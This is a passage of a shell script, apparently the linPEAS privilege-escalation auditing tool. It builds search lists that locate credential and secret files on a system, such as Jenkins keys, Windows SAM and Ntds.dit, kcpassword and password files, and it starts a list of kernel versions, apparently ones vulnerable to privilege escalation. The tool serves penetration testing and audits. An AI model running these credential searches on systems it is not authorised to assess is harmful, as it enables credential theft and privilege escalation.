    904   PSTORAGE_SAMBA=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "smb\.conf$" | sort | uniq | head -n 70)
    905   PSTORAGE_DNS=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}usr" | grep -E "bind$" | sort | uniq | head -n 70)
    906   PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "seeddms.*$" | sort | uniq | head -n 70)
    907   PSTORAGE_DDCLIENT=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70)
    908   PSTORAGE_KCPASSWORD=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "kcpassword$" | sort | uniq | head -n 70)
    909   PSTORAGE_SENTRY=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70)
    910   PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "environments$" | sort | uniq | head -n 70)
    911   PSTORAGE_CACTI=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "cacti$" | sort | uniq | head -n 70)
    912   PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "roundcube$" | sort | uniq | head -n 70)
    913   PSTORAGE_PASSBOLT=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "passbolt\.php$" | sort | uniq | head -n 70)
    914   PSTORAGE_JETTY=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "jetty-realm\.properties$" | sort | uniq | head -n 70)
    915   PSTORAGE_JENKINS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "master\.key$|hudson\.util\.Secret$|credentials\.xml$|config\.xml$|.*jenkins$" | sort | uniq | head -n 70)
    916   PSTORAGE_WGET=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.wgetrc$" | sort | uniq | head -n 70)
    917   PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70)
    918   PSTORAGE_OTHER_INTERESTING=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70)
    919   PSTORAGE_WINDOWS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.rdg$|AppEvent\.Evt$|autounattend\.xml$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.inf$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$|plum\.sqlite$" | sort | uniq | head -n 70)
    920   PSTORAGE_DATABASE=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -v -E '/man/|/usr/|/var/cache/|/man/|/usr/|/var/cache/|thumbcache|iconcache|IconCache' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70)
    921   PSTORAGE_BACKUPS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "backup$|backups$" | sort | uniq | head -n 70)
    922   PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.maintenance.*$|.*\.key$" | sort | uniq | head -n 70)
    923   PSTORAGE_CRONTAB_UI=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "crontab\.db$|crontab-ui\.service$" | sort | uniq | head -n 70)
    924 
    925   ##### POST SERACH VARIABLES #####
    926   backup_folders_row="$(echo $PSTORAGE_BACKUPS | tr '\n' ' ')"
    927   printf ${YELLOW}"DONE\n"$NC
    928   echo ""
    929 fi
    930 
    931 
    932 
    933 
    934 # Variables
    935 
    936 kernelB=" 4.0.[0-9]+| 4.1.[0-9]+| 4.2.[0-9]+| 4.3.[0-9]+| 4.4.[0-9]+| 4.5.[0-9]+| 4.6.[0-9]+| 4.7.[0-9]+| 4.8.[0-9]+| 4.9.[0-9]+| 4.10.[0-9]+| 4.11.[0-9]+| 4.12.[0-9]+| 4.13.[0-9]+| 3.9.6| 3.9.0| 3.9| 3.8.9| 3.8.8| 3.8.7| 3.8.6| 3.8.5| 3.8.4| 3.8.3| 3.8.2| 3.8.1| 3.8.0| 3.8| 3.7.6| 3.7.0| 3.7| 3.6.0| 3.6| 3.5.0| 3.5| 3.4.9| 3.4.8| 3.4.6| 3.4.5| 3.4.4| 3.4.3| 3.4.2| 3.4.1| 3.4.0| 3.4| 3.3| 3.2| 3.19.0| 3.16.0| 3.15| 3.14| 3.13.1| 3.13.0| 3.13| 3.12.0| 3.12| 3.11.0| 3.11| 3.10.6| 3.10.0| 3.10| 3.1.0| 3.0.6| 3.0.5| 3.0.4| 3.0.3| 3.0.2| 3.0.1| 3.0.0| 2.6.9| 2.6.8| 2.6.7| 2.6.6| 2.6.5| 2.6.4| 2.6.39| 2.6.38| 2.6.37| 2.6.36| 2.6.35| 2.6.34| 2.6.33| 2.6.32| 2.6.31| 2.6.30| 2.6.3| 2.6.29| 2.6.28| 2.6.27| 2.6.26| 2.6.25| 2.6.24.1| 2.6.24| 2.6.23| 2.6.22| 2.6.21| 2.6.20| 2.6.2| 2.6.19| 2.6.18| 2.6.17| 2.6.16| 2.6.15| 2.6.14| 2.6.13| 2.6.12| 2.6.11| 2.6.10| 2.6.1| 2.6.0| 2.4.9| 2.4.8| 2.4.7| 2.4.6| 2.4.5| 2.4.4| 2.4.37| 2.4.36| 